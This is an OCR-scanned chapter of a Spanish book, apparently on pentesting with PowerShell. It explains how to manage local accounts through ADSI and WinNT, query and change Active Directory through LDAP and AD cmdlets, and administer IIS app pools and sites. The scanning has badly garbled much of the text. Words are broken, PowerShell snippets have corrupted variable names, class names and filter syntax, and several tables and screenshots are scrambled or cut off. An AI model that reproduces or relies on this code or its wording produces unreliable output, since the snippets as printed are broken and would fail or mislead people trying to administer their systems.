visinlizar  la  maquina  como  un  arbol  donde  la  prop.a  maqutna  es  la  raiz.  Cuando  se  m  objelo 
ZhTw^U  de  la  <aiz  qua  «  la  prop.a  miquim..  Cuando  se  crea  nn  obje.o  8n.po  j.e  s, 
.’  s  al  mismo  nivcl  que  el  objelo  usuario.  Den.ro  de  los  grupos  se  encuenlra  una  iso  de 
“e ZZ  por  10  que  e!  objelo  grupo  seri  el  padre  del  obje.o  miembros  de  usuar.os  d.  d.cbo  grupo. 


Fig.  2.30  Aproximacidt )  a  U*  estructura  Win  ST:. 


En  los  siguientes  apartados  se  estudiara  como  realizar  distintas  acciones  sobre  usuanos  y  grup^ 
perose  disponed,  una  es.ralegia  global  de  como  se  realizaran  las  distintas  consul. as  0 
sobre  la  SAM  a  traves  de  ADS1.  Por  ejemplo,  si  se  requiere  colocar  la  conexion  en  u  j  8™ 
concreto  en  vez  de  abrir  la  conexion  como  se  cxplico  anteriormente,  se  debena  iajai  unn''  „ 
estruciura  de  la  siguiente  manera  See,  =  fADSIJ  ’Wi»NT://<ma<,«ina>/<»omh,v  grupo>.gwup  . 


Lo  diiicil  en  la  presenle  esmiegia  es  saber  que  propiedades  y  mebsdos  utiBaa,  para  obleae-b 
informacion.  Para  ello  se  veran  distintos  ejemplos  en  los  sigmenies  apaita  os. 


Ejemplo  1:  Listado  dc  usuarios  ^ 

En  primer  lugar  y  siguiendo  la  estrategia  definida  en  el 

apuntando  a  la  raiz  de  la  estructura.  Despues  se  mvoca  a  los  ele"s  Jue  J el  nombte* 
quedarse  con  los  que  son  de  clase  user.  Una  vez  realizada  esta  acc.on  hay  que  mosir 
esos  elementos.  Para  el  ejemplo  tambien  se  obtendra  el  ultimo  login. 


Ccipitnlo  //■  Scripting  en  PowerShell 


Scon  -  [ADSI]  "WinNT:/ /$  (hostname)  w 

-cn.psbcise.  Children  i  where  {$_.psbase.  scheinaciassname  -eq  'user';  |  foreach  ($  . 
properties}  foreach  {Write-Host  $_.r»ame  5_.  lastloginj 

Que  propiedades  se  puede  obtener  de  los  usuarios?  Esta  interesante  pregunta  que  respondida 
cuando  al  codigo  anterior  se  le  elimina  el  ultimo  bucle,  obteniendose  la  lista  de  propiedades  que  se 
puede  consultar  de  un  usuario. 


EjempIo2:  Listado  de  usuarios  remotos 

('on  el  siguiente  ejemplo  se  quiere  general izar  en  las  acciones  remotas  con  ADSI  en  bases  de  datos 
dc  cuentas  locales. 

Fs  importante  recalcar  que  existen  distintos  metodos  para  acceder  a  la  lista  de  usuarios  de  la  maquina 
remota.  El  presente  ejemplo  especifica  como  utilizar  ADSI  para  que  interactive  de  manera  remota 
con  otra  maquina. 

Para  lograr  este  objetivo  debe  cumplirse  una  premisa  y  es  que  el  usuario  con  logueado  en  la  maquina 
local  debe  existir  en  la  maquina  remota  y  ser  administrador.  Tras  este  requisite,  el  codigo  del  ejemplo 
anterior  cambia  simplemente  en  la  conexion. 

;  •  ri  [ADSI J  *WinNT:  / / <nombre  maquina  remota>" 

.  .ri.psbase .Children  I  where ($_. psba.se . schemac] assname  -eq  '..ser'}  I  foreach  •$  . 
properties)  |  foreach  {Write-Host  S_.name  $_. 1 ast login ) 

Ejemplo  3:  Crear  usuario 

Hn  primer  lugar.  como  en  las  ocasiones  anteriores.  se  debe  crear  la  conexion  apuntando,  en  este  caso, 
a  la  maquina,  ya  sea  local  o  remota.  Se  dispone  de  un  metodo  denominado  Create  al  cual  se  Ic  pasa 
cl  nombre  dc  usuario  y  el  tipo  user.  Se  puede,  y  es  recomendado,  asignar  una  contrasena  al  usuario. 

icon  [ADSI  "WinNT : //<n ombre  maquina>/f 
Susuano  =  Scon. Create  (  'user' ,  <nombre  usuario>) 

Juauar  10.SetPas.swor  i  (<captraseha>) 

Suauario.SetlnfoO 

11  nombre  de  usuario  y  la  contrasena  deben  ser  una  cadena  de  texto.  El  metodo  Setlnfo  reaJiza  la 
creation  del  usuario  permanente  del  usuario  cn  el  sistema.  Por  delecto,  el  usuario  debera  cambiar 
1^  contrasena  en  el  siguiente  inicio  de  sesion  y  para  realizar  la  creacion  de  los  usuarios  hay  que 
disponerde  una  Powershell  con  elevacion  de  privilegios. 


•gvinjiH)  itiinunar  usuario 


c^m»naci6n  de  un  usuario  simplemente  debe  ejecutarse  el  metodo  Delete  indicando  el  tipo 
jeto  que  es,  user,  y  cl  nombre  del  usuario  que  se  desea  eliminar.  Por  supuesto.  en  primer  lugar 
que  realizar  la  conexion  apuntando  a  la  maquina,  que  es  el  nivel  donde  cuelgan  los  usuarios. 

Icon  r  1 !'  WinNT:  //<nombre  maquina>" 
ete('user',  cnombre  usuario>) 
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ADSI:  La  API  para  Active  Directory 

El  directorio  activo  podria  ser  tratado  con  el  proveedor  WinNT,  pero  se  simplifica  la  gestion  utihzando 
el  proveedor  LDAP,  que  esta  creado  especificamente  para  esie  uso.  La  estrategia  para  la  gestion  de 
directorio  activo  es  similar  que  la  utilizada  con  WinNT.  En  primer  lugar  se  debera  conectarse  al 
objeto  del  directorio  activo  y  realizar  su  administracion. 

LDAP  utiliza  unos  parametros  especiales  para  indicar  ciertos  valores  en  el  momenlo  de  la  conexion, 
consulta.  modification  de  valores  de  los  objetos  del  directorio  activo.  En  la  sigmente  tabla  se  facilitan 
los  utilizados  en  el  presente  apartado. 


Pari  metro 

Descripcion 

CN 

ldentifica  el  nombre  del  objeto 

OU 

Identifica  una  unidad  orgamzativa 

DC 

ldentifica  el  componente  de  dominio 

DN 

Identifica  de  forma  univoca  un  objeto  en  la  estructura  del  directorio.  Se 
puede  ver  como  la  ruta  hacia  cl  objeto.  espccificando  CN.  OU.  DC 

Tabla  2 . 10:  Parametros  LDAP 


El  DN.  Distinguished  Name,  comienza  por  cl  CN,  Common  Name,  y  se  va  esptu  lean  o  os 
elementos  que  hay  por  encima  del  objeto  hasta  llegar  al  dominio.  es  decir.  pasando  por  las  diferentes 
OU.  Organizational  Unit,  hasta  el  DC.  Domain  Component. 


Conexion  al  AD 

La  conexion  al  directorio  activo  puede  realizarse  en  local  o  en  remote.  Esta  ultima  conexion  es, 
ueneralmente,  la  mas  utilizada  para  administrar  distintos  dominios.  Para  realizar  la  conexion  a  la 
raiz  del  dominio  actual  se  ejecutara  cl  siguiente  codigo.  No  se  especifica  ningun  objeto  concrete,  ya 
que  no  se  tiene  porque  saber  que  objetos  componen  el  dominio.  F.sta  conexion  es  ideal  para,  una  viz 
conectados.  realizar  la  busqueda  dc  objetos  a  traves  de  la  estructura. 


Sdominic  L ADSI LDAP: //DC~164, 3C=  icol 

flOtra  ope  ion  equivalents  es 
Sdominio  &  (ADSlJ#r 


Si  se  requiere  una  conexion  a  tin  objeto  en  concrete,  seria  tan  sencillo  como  almacenaren 
una  variable  el  objeto  que  devuelve  la  cadena  de  conexion,  Sdommm  -  [ADSI]  WAr. 
CN—<ohjeto>. OU=<nomhre  O U> ,DC  <dom inio>. DC—  < don't inio  iai-^  . 


La  sintaxis  es  scncilla.  hay  que  crear  un  objeto  de  la  ciase  anteriormenle  comentada  indicanilo 
en  la  cadena  el  nombre  del  dominio  o  IP  a  la  que  se  requiere  conectar,  el  usuario.  que  debe  ser 
administrador.  y  la  contrasefia.  Un  ejemplo  dc  esta  sintaxis  es:  Sdominio  =  New-Object  System. 
Piivdon’Services.Directon'Entn  f  LDA P://<IP  o  nombre  dominio>  '.  ’<usuario  administrador> '. 
<contraseha> '). 

Buscar  objetos  en  el  AD 

Lna  vcz  se  ha  estudiado  como  realizar  las  conexiones  con  la  estructura  del  scrvicio  de  directorio  la 
busqueda  de  objetos  va  a  resultar  muy  sencilla.  Se  utilizara  un  filtro  con  el  que  obtener  los  objetos 
requeridos  por  el  administrador  y  2  metodos  que  mostraran  todos  los  valores  (iltrados  o  el  primero 
los  encontrados. 

I.a  busqueda  se  va  a  poder  real  izar  de  cualquier  tipo  de  objeto.  incluso  se  podra  utilizar  mctacaracteres 
con  los  que  conseguir  ampliar  el  abanico  de  la  busqueda.  Para  la  busqueda  de  objetos  se  utiliza  la 
close  de  .NET  Framework  System. DirectorySenices.  DirectorySearcher. 

La  estrategia  que  se  seguira  es  la  siguiente.  en  primer  lugar  se  obtendra  la  conexion  al  dominio  raiz. 
ya  sea  local  o  remote,  o  la  conexion  al  objeto  en  concrete  sobre  el  que  se  requiera  una  busqueda 
a  partir  de  dicho  nivel.  Una  vcz  crcada  la  conexion  se  creara  el  objeto  de  busqueda.  a  pailir  de 
la  ciase  mencionada  anteriormenle.  Este  objeto  dispone  del  metodo  Filter  el  cual  sera  utilizado 
para,  mediante  reglas.  filtrar  los  objetos.  Por  ultimo  se  utilizara  los  metodos  FindOne  o  FindAll.  en 
funcion  de  si  sc  quiere  mostrar  el  primer  objeto  filtrado  o  todos  los  filtrados. 

;<iominio  ~  [APSTI 9  LDAP: //DC-16'5,  DC=loc;a1  9 

::  No.w-Object  System .  Di  recto  ^Services  .  1.1  •:  rectorySearcher  (^doiTini  o) 

jhuaqueda . !•  .  leer  '  (<cornparaci6r.>)  ' 

.Mi.-iqut-da  .  t  i : . : tA  1  1  ( ) 

Hay  que  recalcar  que  el  (iltro  puede  llevar  comparaciones  compuestas,  es  decir.  con  Y  logicos 
u  ()  logicos.  Un  ejemplo  dc  esa  coniparacion  seria  Sbuscjuecia.Filier=  (<&(comparacion / ) 
t comptiracio/i 2)  \ 


Ejemplo  I:  Listar  equipos 

i  I  codigo  para  listar  los  equipos  que  se  encuentran  en  el  dominio  sobre  el  que  se  ha  realizado  la 
conexion  es  el  siguiente. 


Idominit  -  [ADSI J 'LDAF:/ /DC- 11 paths ,DC= local' 
-busqueda  -  New-Opiect  Sysrem . Dii v  ;toryServi ces 
-busqueda.  Fi  1  tet-'  (o'ojectclass^coinputer  > ' 
-busqueda,  FindAU 


.DirectorySearcher  (Sdomirun) 


Para  realizar  una  conexion  con  las  credenciales  de  otro  usuario  administrador,  ya  sea 
a  otro  dominio  distinto  en  el  que  no  se  encuentra  la  maquina  or.gen  o  porque  se 
otras  credenciales  en  mismo  dominio.  bay  que  utilizar  la  ciase  de  Nl  I  Fuimeu<  v  ^ 
Di rectoiyServices. Directory Entiy.  Se  explicaran  a  lo  largo  del  apartado  las  d.stintas  clases 
Framework  que  son  necesarias  para  la  administracion  del  directorio  activo. 


Ejemplo  2:  Listar  usuarios  y  grupos 

^odjgo  para  el  listado  de  usuarios  y  grupos  es  similar,  salvo  que  en  los  usuarios  hay  que  listar 
mas  que  lo  filtrado  pertenece  a  una  categoria  denominada  persona. 
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Sdominio  -  tADSI]'LDAP://DC-llpaChs, DC-local'  Searcher (Sdominio) 

,hl,.mipda  =  New-Object  System. DirectoryS#rvic** .Directo. yoe 

SS3SS.«!"^  « ,ob,.ctC.t,,ory-p.r.o«. , 

„„p„.  Mtrt.nur'  (obJ.olcl..«rto») 

$busqueda . FindAl 1 


Administraci6n 

.Cos ™ cMgo 2 

entre  estos  objetos. 

E„  el  presente  apan.de  se  explicaran  de  maher.  conjuma  las  ..clones  sina, lares  enlrc  es,os  obje.es. 
y  especificando  los  casos  en  los  que  no  son  iguales. 

Eiemplo  3:  Crear  objetos 

En  el  siguiente  ejemplo  se  muestra  hSllS 

Se  utiliza  el  metodo  Create.  ///>■<-  n  ,  •  ^re  el  objeto  y  el  lercer  metodo  hace 

ban  sldo  es.ndlados  en  e,  apanado d, 

oestion  de  cuentas  locales. 

En  ,  creacion  dc  usuaHos  es  —  — 

usuarios^uede^i^m^enarse  en  un  contenedor.  unidad  organizativa  o  en  la  raiz 
del  dominio.  En  el  ejemplo,  se  almacenara  en  el  contenedor  de  usuanos. 

$usuatio . Set  Into ( ) 

La  creacion  dc  unidades  on.aniaa.ivas  es  similar  a  la  Creadon  de  usuarlos.  simplemenlc  ha,  «. 
indicar  que  lo  que  quiere  crear  es  una  OU. 

jfConexibn  a  la  ruta  mediants  LDAP  ,  OU-<nombre  0U>’> 

$ou  =»  Sdomi nio. Create  (  organ izac-onaj  Unit  , 

$ou.Sei:IntoO  M 

Para  *  on,  unidad  organiaariva  en  el  hue, lor  dc  «ra  I.  cadena  de  conexion  seria  *-*1 
[ADS1J‘LDAP://OU=<ou ptidre>.DC~Upcttfls,DC  local  . 

Ejemplo  4:  Mover  objetos  Fsle  mctod» 

Para  mover  objetos  dentro  del  directorio  activo  se  dispone  del  °  ca°^senciHa,  en  pn«* 

tambien  sc  utiliza  para  renombrar  el  nombre  de  los  objetos.  U «  sem^.  del  ol** 

l.ionr  se  crea  un  objeto  que  apunta  a  la  ruta  del  proveedor  LDAP,  esta  ruta 


que  se  quiere  mover.  Despues,  sc  ejecuta  el  metodo  Move  Here  pasando  como  parametro  la  ruta.  que 
sera  el  origen.  del  objeto  que  se  quiere  mover. 

= Mover  una  00  de  la  raiz  del  dominio  a  una  OU 

Sdestino  =  [ADSI] *  LDAP: //  OU=<ou  dest:ino>, DC«llpaths, DC-loca l' 

Sdes tine. MoveHer e  ( 'LDAP: //OU=<ou  ori.gen>,  DC-llpaths,  DC=local'  r  ' OU=<Nupvo  u  more 
ou>') 

•Mover  un  usuario  de  un  contenedor  a  otro 
5 destine  -  [ADSI J  ’  LDAP : / /CN=3uiltin, DC=llpatha, DOlccal' 

S destine. MoveHer e  ( 'LDAP:/ /CN=<usuario>,  CN  Users,  DOlipaths,  DC-local' ,  'CN-  cnorrbre 
usuario># ) 

•Mover  ur.  grupo  de  un  contenedor  a  otro 

Sdestino  =  [ADSI  J  *  LDAP :  / /CN=Users,  DC-llpaths,  DC=local' 

:  jestir.o.MoveHere  ( 'LDAP:  / /CN^<gruuo>, CN=Users,  DC=llpaths,  DC>iocai  ' , '  CN-  <n ombre 
qrupo>' ) 

Cmdlets  desde  Windows  2008  R2 

La  version  Windows  Server  2008  R2  dispone  de  un  modulo,  que  se  instala  en  el  servidor  cuando  el 
rol  de  Active  Directory  es  agregado.  Este  modulo  aporta  un  proveedor  con  el  eual  poder  navegar 
por  el  directorio  activo  como  si  se  tratase  del  sistema  de  archivos.  Tambien  aporta  un  conjunto  de 
mullets  con  el  que  realizar  las  tareas  de  administration  sobre  el  directorio  activo.  Para  caruar  el 
modulo  sc  dispone  del  cmdlet  Import-  Module.  La  instruction  para  cargar  el  modulo  es  Import - 
Module  AcliveDireclory. 

El  proveedor  de  Active  Directory 

F.l  proveedor  facilita  la  navegacion  por  el  directorio  activo  de  tal  forma  como  si  cl  usuario  se 
cnconlrasc  navegando  por  el  sistema  de  archivos.  En  el  proveedor  se  puede  utilizer  los  cmdlets 
basicos  para  crear,  eliminar.  listar  y  moverse  por  el  sistema  de  archivos.  salvo  que  esta  vez  las 
acciones  se  real  i/an  sobre  el  directorio  activo. 


I  na  vez  cl  modulo  de  Active  Directory  esta  cargado  se  accede  a  el  con  la  instruction  cd ad:  como  si 
*  cambiase  de  unidad.  Para  listar  el  contenido.  directamente  Is  o  get-child  item. 


2  U:\Usei>s\fldninist 
PS  «D:\>  Get-Childlt 

radoi*>  cd  ad: 
en 

N  <|ir 

ObjectClass 

DistinguishedName 

141 

‘ iguration 
bchcrui 

>r>DnsZones 

K>i*«5tDnsZones 

8D:\> 

donainDNS 

configuration 

dMD 

donainDNS 

donainDNS 

DC=i64, DC=local 

CN=Conf igurat ion , DC=i64 , DC=local 

CN=C°nf igurat ion , DC=i64, DC=local 
DC=DonainDnsZones,DC=i64,DC=local 
DC-ForestDnsZones . DC=i64, DC=local 

f-ig.  2.31 :  Accexoy  listado  de  reewsos  en  el  proveedor  de  Active  Directory. 


.Cr  cnlre.los  distint°s  contenedorcs  del  directorio  activo  se  utiliza  el  comando  cd  o 

tOAP «n^!  :l  navegacl6n  se  realiza  con  las  rutas  completas  que  se  estudiaron  con  el  proveedor 
rcn  cl  apartado  anterior. 


Penresling  con  PowerSliell^ 


Ejemplo  1:  Crear  objetos  En  el  siguiente  ejemplo  se 

especifica  cl  andlet  para  cada  requisite. 


New-ADGmnp 


sjew-ADCompmer 


Crea  un  nuevo  cquipo  cn 


- ...  ..  |  Crea una  nueva  unidad  organizaliva_ 

New- A  DOigunizationalunn  I  — — - - 

Tahiti  2.11:  Cmdlel  de  creation  de  objelos. 


Parametro 

Name 

Enabled 


Accout  Password 
CaimotChangePassword 


ChangePasswordA  t  Logon 


Descripcion 

Nombre  del  usuario _ 

Tndica  si  la  cuenta  debe  estIT habilitada  o  deshabilitada.  Se  espe- 

‘  cifica  con  las  variables  booleanas  Sirue  o  jfal* - 

Tndica  una  nueva  contrast  Se  debe  especificar  en  lorma.o 
SecureString _ _ _ 

Indica  si  la  contrasefia  se  puede  cambiar  o  no.  Se  especi 
mediante  valorcs  booleanos _ — 

Indica  si  la  contrasefia  debe  modificarse  en  el  siguiente  i 

sesion 


Tnhi/t  •>  n-  Parcimetros  tic  New-ADUser. 
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F.l  siguiente  codigo  crea  un  usuario  con  nonibre  Pablo,  el  cual  no  podra  cambiar  la  contrasefia. 
debera  cambiar  la  clave  en  el  siguiente  inicio  de  sesion  y  la  cuenta  esta  habilitada. 

Por  seguridad  cl  parametro  dc  la  clave  se  obtiene  mediante  el  cmdlel  Gei-Credenlial.  pero  solo  se 
requiere  un  objelo  de  tipo  SecweString.  por  lo  que  hay  que  acceder  al  atributo  password que  es  de 
ese  tipo. 

Kev;-ADUsc?r  -name  pabio  -CannarChanqePassword  Sfalsc  -Char.ge?as3W0rdAtI*ogon  ,ctr:e 
-Account Password  $ (Get -Credential ) .password  -Enabled  3  true 

En  la  creacion  de  grupos  hay  que  tener  en  cuenta  si  cl  grupo  es  local,  universal  o  global.  Este  andlet 
dispone  dc  gran  cantidad  de  propiedadcs,  que  merecen  estudio  por  parte  del  lector.  En  la  siguiente 
mbla  se  puede  visualizar  algun  parametro  interesante. 


Parametro 

Descripei6n 

Name 

Nombre  del  grupo 

GmupCategoiy 

Indica  si  el  grupo  es  de  distribucion  o  seguridad 

GmupScope 

Indica  el  ambito  del  grupo.  Puede  ser 

Domain  Local.  Global.  Universal 

Path 

Indica  la  ruta  del  comenedor  o  unidad  organizativa  donde  se  creara 

el  objeto 

Credential 

Indica  las  credenciales  con  las  que  el  objeto  se  creara.  No  conftindir 
con  las  claves  de  los  objelo  usuario 

Tab/a  2.13:  Par  amelias  tie  Ncw-ADGroup. 


I-I  siguiente  codigo  proporciona  la  crcacion  de  un  grupo  global  en  la  ruta  indicada  por  cl  usuario. 

New-ADGroup  Marne  miGrupo  -GroupScope  Globa i  GroupC^-egcry  Security  PaLh  'OU=lni 
c  mat  ica,  UC=  llpath:;,  DC« local* 


Ejemplo  2:  Buscar  objetos  con  filtros 

l*ara  reali/ar  busquedas  dentro  del  directorio  aclivo  es  interesante  conocer  el  concepto  de  llltro. 
t  \istcn  distintos  filtros  con  los  que  poder  realizar  las  busquedas.  pero  lo  que  mayor  flexibilidad  y 
fcmlimienio  da  a  los  filtros  son  los  metacaracteres. 


I  I  1'iltro  LDAP  es  realmente  util,  sobre  todo  si  el  usuario  conoce  la  sintaxis  de  las  busquedas.  El 
cmdlct  Get -A  DOhject  permite  consultar  infbrmacion  del  directorio  active,  se  realiza  la  recuperaeion 
distintos  objetos.  Este  andlet  dispone  del  parametro  LDAPFUter .  el  cual  se  encarga  de  reali/ar  la 
*|ueda  de  objetos  que  cncajen  con  el  filtro  LDAP  indicado. 

PorU^^p10  c6d,g°  sc  puede  visualizar  un  filtro  LDAP  para  recuperar  los  usuarios  que  empiezan 

III  "kDAPFiiter  1  (&  (objeccCategory=user)  (name^p*)  )  f 

ue  todos  los  usuarios  cuyo  nombre  empieza  por  la  lecra  P 


Pentesting  con  PowerShell 


Capitnlo  IJ.  Scriptingen  PowerSlie/l 


■  i-  i  ,,rt  fiitrn  t»enerico  con  el  oue  realizar  busquedas  de 

como  ^  -  “d‘M  *  “n‘CKrs  “ q" se 
p«de  escribir  regl.s  sincacticas  da  lentmjes  de  progt.mnc.on. 

cuyo  nombre  empieza  por  la  lelra  W. y  ona  L  torio^ccivo  d6n<ie  se  encuenlre  el  osuario, 

Cer-AOObi.ee  -«1««  l  lObi.otCl...  -»  ■c^nia.taon.lOni.  • 

Gec-ADObjeet  -Filter  1  (Obj.ctCl...  j’ „„  ei  asterircQ 

j*Para  mostrar  todos  los  ooje  - 

Get-ADObject  -Filter 

Ejemplo  3:  Adicinn  /  *  "»  " 

Tcl^lry  tZZToLXZt  realmeme  aencillo  y  el.mioar 

a  un  grupo. 

*a-i '  ri  rn  de  va^ios  usuarios  a  un  grup-  ,  ri9"> 

#AdlClcn  je  -  crnciiAr  icl>.  <usuario2> 

Add- ADG r oupMe  mbe r  <nombre  gru. 

— « — >■<— 

Internet  Inlormation  Services^  djsp0nc  de  la  posibilidad  de  ser gesiionado 

Internet  Information  Services,  en  adela  ,  ^  in(egrado  en  las  plataformas  Window 

mediante  la  linea  de  comandos  Powetsl  •  entomo  del  gran  servidor  para  todo  dc 

la  cual  ofrece  dislintas  funcionalidades  para  gestionar  el  entomo  g 

Microsoft . 

Pam  poder  dinner  de,  mddulo  para 

-  - ■— 

scripts  v  herremrientas  de  administration  de  IIS. 

. 1 1  j 

En  Me. . Sen.,' -’MM viene  inatalada  por servidor 

J 


Seleccionar  seivicios  de  funcion 


Antes  de  corner!  zar 
R^oones  de  servidor 
Servidor  web  (IIS) 


Sdecaooe  los  servtaos  de  finoon  que  desea  mstalar  para  Servidor  web  (IIS): 
Servioosdefuncjdn:  Descnpdon: 


 □  Regetro  ODBC 

3  01  Segundad 

r  Autenticadon  basica 
_J  Autentcaddn  de  Windows 
1  1  Autenticadon  impliata 

Au  ten  Oca  den  de  asignacones  de  ceroficado  de  d 
D  Auterticaddn  de  astgnacones  de  certficado  de  d 
PI  AutorOTGon  para  URL 
17,  Rltro  de  soliatudes 
r  Restriccones  de  IP  y  domirso 
S  01  Rendimierto 

E  Compreston  de  conterudo  estaoco 
[Z1  tompresidn  de  contentdo  dmamico 
3  O  Herramientas  de  acmristraaon 

0  Consoia  de  adm  nistraaor  de  IIS 

C_  Servido  de  adrnfnistraaon 
3  Cl  Compatibilidad  con  la  administraacir  de  US  6 

I _  Compatixlidad  con  la  metabase  de  IIS  6 

Ls  Compatibilidad  con  WMI  de  135  6  . 

.  I  '  Uaw.Wu««4-,^  Wvt  nU  TTf  £  T  I 

J -  I L| 


“371  Scripts  v  herramtentas  de 
“*  adminlstradon  de  11$  proporaona  una 
infraestructura  para  administrar 
mediante  programadon  un  servidor 
web  de  nS7  mediante  comandos  en 
una  ventana  de  comandos  o 
ejecutando  scripts.  Puede  usar  estas 
herramientas  si  desea  automatizar 
comandos  en  archivos  por  lotes  o 
cuando  desee  evitar  la  sobrecarga  de 
administrar  IIS  mediante  la  interfa2  de 
usuano. 


Fir.  2.33:  histahcion  del  modulo  en  lu  version  Windows  Server  200S  ft 2, 


l  na  vcz  instalado  o  liabilitado  cl  modulo  sc  realizing  la  im  portae  ion  dc  los  c  indicts  de  la  sisuiente 
mancra  import-module  wehadministration.  Para  comprobar  el  numero  de  cmdlets.  alias  y  funciones 
que  se  disponen  en  este  nuevo  modulo  de  gestion  de  IIS  se  puede  ejecutar  la  siguiente  instruccion 
gvi-command  -module  wehadministration. 


En  la  siguiente  imagen  se  puede  visualizar  la  , 

Mil  i  *  lit  >  //.  I  ^  I  '  <1  I  I  I  I  .  •  J  I  ■  I  M  .  V  .«  n  J  a  -- ;  I  _  


do  ^•Nf,sersNnrtplinistl*a<*or>  Import -nodule  uebadm  in  1st  ration 

FS  C:\Usei*s\Administj*ador>  Get-Command  -Module  webadmin istrat 

ConmandT  ype 

Name 

Cndlet 

Cndlet 

Cndlet 

Cndlet 

Alias 

Cndlet 

Cndlet 

Cndlet 

Cndlet 

Cndlet 

Cndlet 

Cndlet 

AUas 

Add-WebConf igurat ion 

Add-WebConf igurat ionLock 

A  dd-V/e  bCo  n  f  igura  t  io  n  Pro  pe  r  t  y 

Backup-UebConf igurat ion 

Begin-UebCommitDe lay 

C le  ar- We bCo  n  f igurat io  n 

Clear-WebReques tTrac ingSet t ings 

Convert To-WebApplicat ion 
Disable-lfebGlobalModule 

Disable-UebRequest Tracing 
Enable-WebGlobalModule 

Enable-WebRequestTrac ing 

End-WebCommitDe lav 

Fig.  2.34:  Importation  del  modulo  de  IIS  (V' parte). 


Cndlet 
Cndlet 
Cndlet 
Cmdlet 
Cndlet 
Cmdlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Cndlet 
Function 


Ge t -Ue b A ppDo na in 

Get-UebApplication 

Ge  t -We bA  ppP o  o IS  t  at  e 
Get-WebBinding 
Get-WebConf  igFile 
Get-WebConf iguration 
Get-UebConf igurat xonBackup 
Ge  t -WebCon  f igurat  xo  nLocat ion 
Get-WebConf igurat lonLocK 
Get-WebConf igurat lonPropei ty 
Get-WebFilePatb 
Ge t - We bG loba ltto du le 
Get-WebHandler 
Get-WebltenState 

Ge  t  -  We  bMan  age  dtlo  du  le 

Get-WebBequest 
Get-Website 
Get -Webs iteState 
Get-WebURL 

Get-WebUirtualDirectorv 


flg  2.34:  Importation  del  modulo  de  IIS  (2" parte). 

.  c  7f)no  no  existe  el  cmdlet  import-module  por  lo  que.  tras  la  instalacion  cotnemada 

«*. « » ^  ei  moduio“ 

la  Powers  hell. 

webadministratiou). count. 

imagen  de  ejemplo. 


Bindings 


State  ri.  „-8 

Started  xSystenDriueX.NinetpubSwwuroot  h«V,21 

Started  C=SinetpubSf tproot 


n  >• 

ID  State  Physic a IPatb 

Default  Web  Site  T  Sorted  xSystenDriueX 


- -  Fig,  2.35:  Accesoy  tistado  de  recurxos  en  el  proveedor  de  IIS. 

En  el  proveedor  sc  peeden  ulilizar  los  cmtlleK  Ms.c.^  “re  tosdSintos  elcmcew  « 

JESSES* ’•££  se  eloia  c,  contoeido  de  la  *•—'*'  | 

puettos  y  protocolos  estan  atadas  dichas  aplicaeiones. 


( ' aphid o  //.  Scripting  en  PmverShe/l 


Gestion  de  sitios 

Los  application  pool  o  pool  de  aplicaeiones  son  procesos  que  agrupan  un  conjunto  de  aplicaeiones. 
Los  pool  definen  algunos  aspectos  de  seguritlad  y  propiedades  de  las  aplicaeiones  que  se  ejecutan 
denlro  del  pool. 

Para  crear  un  nuevo  pool  de  aplicaeiones  se  puede  ejecutar  cl  cmdlet  new-webAppPool  o  dircctamente 
ejecutar  un  cmdlet  basico  como  es  new-item  indicando  como  ruta  la  del  proveedor  US.  por  ejemplo, 
new-item  IIS:\AppPools\<nombre  nuevo pool>. 


PS  C:\  04/26/2012  22:03:49  > 

PS  C:\  04/26/2012  22:03:50  >  New-WebAppPoo 1  poolI64 
Nane  State  Applications 

poolI64  Started 

PS  C:\  04/26/2012  22:04:06  >  new-item  IIS: \AppPoo Is  Vpoo IPablo 
Nane  State  Applications 

poo IPablo  Started 

PS  C:\  04/26/2012  22:04:18  >  Is  I IS :\AppPools 

Nane  State  Applications 

DefaultAppPool  Started  Default  Web  Site 

wee 

jose  Started 

poolI64  Started 

poo IPablo  Started 


I7 ip  2.36:  Creadon  de  tin  poo!  de  aplicaeiones. 


A continuacion  sc  cspccifican  distintos  comandos  que  pueden  scr  utilizados  para  la  gestion  de  los 
pool  de  aplicaeiones. 


Cmdlet 

Descripcion 

Get-  W  { ebAppPoolState 

Indica  el  eslado  en  el  que  se  encuentran  los  distintos  pool  de 
aplicaeiones  de  la  maquina 

Remove - 1  VebAppPool 

Elimina  el  pool  que  sc  especifique  junto  al  cmdlet.  Tambien 
se  podria  eliminar  con  remow-item  IIS: Mpp  Pools \ <nombn 
pool> 

Restart-  H’ehAppPool 

Reinicia  cl  pool  de  aplicaeiones,  deteniendo  las  aplicaeiones 
asociadas  a  el 

- Stop-  WehAonPoo! 

Detienc  el  pool  de  aplicaeiones 

-  Start-lVchAnnPnnl 

Arranca  e!  pool  de  aplicaeiones  espeeificado 

Tabla  2.14  *  Cmdlet s  pctra  la  gestion  del  poo!  de  aplicaeiones 
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U  crocibn  do  wn«  aplicacion  w=b  diSp««  do  3  ££ 

fisica  tambien  se  especifica  mediante  el  pavimcwo  phystcalpath- 

. . . . ■in  ■'in ■*.ii j-i.rum 


_  _ _Sifraf!!Tn,eb  site'  -Physical^  C:MnetpubNw,,u 

ola/OU/2\AYI  2^30^59  >  HcM-«obflpplication  narw  1  P 
PS  Cisinetpub  04/26/2012 
-flpplicationPool  poolPablo 

Application  pool  Protocol; 


poolPablo 


f?jg  y.37 :  Creation  de  wia  aplicacion  web. 

A  continuacion  ac  ospocidoad  —  dodicados  a  I.  goa.idp  do  ta  apUcacicos  wob  contend  o» 
los  sitios  web. 


de  tin  sitio  web. 


A  continuacion  se  especifica  una  tabla  que  resume  los 
sitios  web  en  Powershell. 


Fig.  2.38:  Creaciin  etc  tin  sitio  weh. 

cmdiets  relacionados  con  la  gestion  de  los 


Cmdlet 


Get- WebSite 


Get-  WebSiteState 


Remove-  WebSite 


Description 


Lista  los  sitios  web  disponibles  en  11S 


lndica  el  estado  de  ejecucion  de  los  sitios  web  disponibl - 

Elimina  un  sitio  web 


IIS 
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Cmdlet 

Description 

Start-WehSite 

Arranca  un  sitio  web 

Stop-  WebSite 

Detiene  la  ejecucion  de  un  sitio  web 

Tabla  2.16:  Cmdiets  para  la  gestion  de  sitios  web. 


La  gestion  de  los  sitios  FTP  desde  PowerSheU  es  realmente  sencilla.  Se  dispone  de  un  solo  cmdlet 
que  utilicc  la  semantics  FTP  Site .  el  cual  es  new-webftpsite.  Los  parametros  mas  utilizados  a  la  hora 
dc  ejecutar  el  cmdlet  son  name,  port,  physicalpatb.  hostheader  e  ipaddress. 


